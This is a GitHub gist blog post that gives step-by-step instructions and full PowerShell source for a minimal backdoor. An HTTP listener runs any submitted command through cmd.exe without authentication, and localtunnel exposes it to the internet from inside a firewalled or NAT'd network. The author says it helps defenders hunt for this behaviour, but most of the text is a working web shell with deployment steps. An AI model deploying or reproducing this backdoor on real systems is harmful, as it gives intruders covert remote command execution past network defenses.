Skip to content

Instantly share code, notes, and snippets.

@djhohnstein
Created March 27, 2019 04:01
Show Gist options
  • Save djhohnstein/6012f044708294282c3d6f6686c67b57 to your computer and use it in GitHub Desktop.
Save djhohnstein/6012f044708294282c3d6f6686c67b57 to your computer and use it in GitHub Desktop.
Gist Blog - Inside Out, Simple backdoors
From the inside out, a minimalist backdoor.
I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.
We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel
While I have a full compact, custom version, I will not release this.
This post is just to show you the concepts so you can test or hunt for this type of behavior.
If you want to customize this then do it yourself. For this example, I'm being intentionally noisy.
The idea is simple.
A host inside the target network, advertises a simple back door publicly. For this I will simply use a local web server on port 9999. You do not need to be admin to listen on high ports. You could easily leverage this to reroute or tunnel protocols like ssh or rdp.
Steps.
1. Download this gist to some windows host
2. Extract to some folder.
3. install nodeJS
4. start PowerWebShell.ps1
5. npm install -g localtunnel
6. lt --port 9999
localtunnel will emit a url that exposes the backdoor, simple browse to that.
example https://stranger-things-12.localtunnel.me/shell
You can then execute commands etc.. to demonstrate the effectiveness of an inside out tunnel.
Thats all
Cheers,
references:
https://localtunnel.github.io/www/
https://nodejs.org/en/
example, setup linux server
point DNS at it.
install node
install localtunnel-server
`node -r esm ./bin/server`
<#
Simple Web Shell over HTTP
#>
$Server = '127.0.0.1' #Listening IP. Change This. Or make it a parameter, I don't care ;-)
function Receive-Request {
param(
$Request
)
$output = ""
$size = $Request.ContentLength64 + 1
$buffer = New-Object byte[] $size
do {
$count = $Request.InputStream.Read($buffer, 0, $size)
$output += $Request.ContentEncoding.GetString($buffer, 0, $count)
} until($count -lt $size)
$Request.InputStream.Close()
$cmd = $output.Split("=")
$OutputVariable = &{ cmd.exe /c $cmd[1].Split("+") | Out-String}
return $OutputVariable
}
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://127.0.0.1:9999/')
$listener.Start()
'Listening ...'
while ($true) {
$context = $listener.GetContext() # blocks until request is received
$request = $context.Request
$response = $context.Response
$hostip = $request.RemoteEndPoint
if ($request.Url -match '/shellPost$' -and ($request.HttpMethod -eq "POST") ) {
$message = Receive-Request($request);
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
continue
}
if ($request.Url -match '/shell$' -and ($request.HttpMethod -eq "GET")) {
$enc = [system.Text.Encoding]::UTF8
$response.ContentType = 'text/html'
$shellcode = '<form action="/shellPost" method="POST" >
Command:<br>
<input type="text" name="Command" value="ipconfig.exe"><br>
<input type="submit" value="Submit">
</form>'
$buffer = $enc.GetBytes($shellcode)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
continue
}
$message = '<html><h1>It Works!</h1></html>'
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
}
$listener.Stop()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment